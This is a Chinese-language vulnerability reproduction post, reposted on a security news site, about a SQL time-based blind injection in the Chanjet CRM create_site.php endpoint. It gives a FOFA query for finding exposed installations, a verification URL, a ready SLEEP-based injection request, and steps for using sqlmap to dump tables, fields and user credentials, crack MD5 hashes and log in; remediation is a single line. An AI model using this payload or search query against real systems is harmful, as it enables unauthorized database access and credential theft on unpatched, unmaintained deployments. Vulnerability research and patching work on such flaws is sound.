畅捷通CRM SQL注入漏洞

admin 2023年7月6日18:49:58评论103 views字数 662阅读2分12秒阅读模式
漏洞简介
用友畅捷CRMcreate_site.php处存在SQL时间盲注,未对后台功能做有效的身份认证与用户的输入进行安全过滤,导致在权限绕过可直接访问后台存在SQL注入漏洞的缺陷路径攻击者可以利用该漏洞获取网站后台数据库敏感信息,进一步利用可接管服务器权限。
FOFA语句

app="畅捷通-畅捷CRM"

畅捷通CRM SQL注入漏洞

漏洞复现

畅捷通CRM SQL注入漏洞

首先验证是否存在漏洞

http//:your-ip:port/WebSer~1/create_site.php?site_id=1

畅捷通CRM SQL注入漏洞

出现如图的弹窗,则漏洞存在

构造payload

GET /WebSer~1/create_site.php?site_id=1+AND+%28SELECT+6663+FROM+%28SELECT%28SLEEP%285%29%29%29Jdzn%29 HTTP/1.1

畅捷通CRM SQL注入漏洞

1.通过sqlmap爆破表名

畅捷通CRM SQL注入漏洞

2.爆破字段名

畅捷通CRM SQL注入漏洞

3.爆破字段内容

畅捷通CRM SQL注入漏洞

4.用户名、密码

畅捷通CRM SQL注入漏洞
爆破成功,MD5解码,成功登入:

畅捷通CRM SQL注入漏洞

修复建议
畅捷通CRM版本官方已经不再维护,建议受影响的用户收敛系统仅内网访问或部署WAF

畅捷通CRM SQL注入漏洞

本文版权归作者和微信公众号平台共有,重在学习交流,不以任何盈利为目的,欢迎转载。

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。公众号内容中部分攻防技巧等只允许在目标授权的情况下进行使用,大部分文章来自各大安全社区,个人博客,如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览!!!

原文始发于微信公众号(巢安实验室):畅捷通CRM SQL注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月6日18:49:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   畅捷通CRM SQL注入漏洞https://cn-sec.com/archives/1856379.html

发表评论

匿名网友 填写信息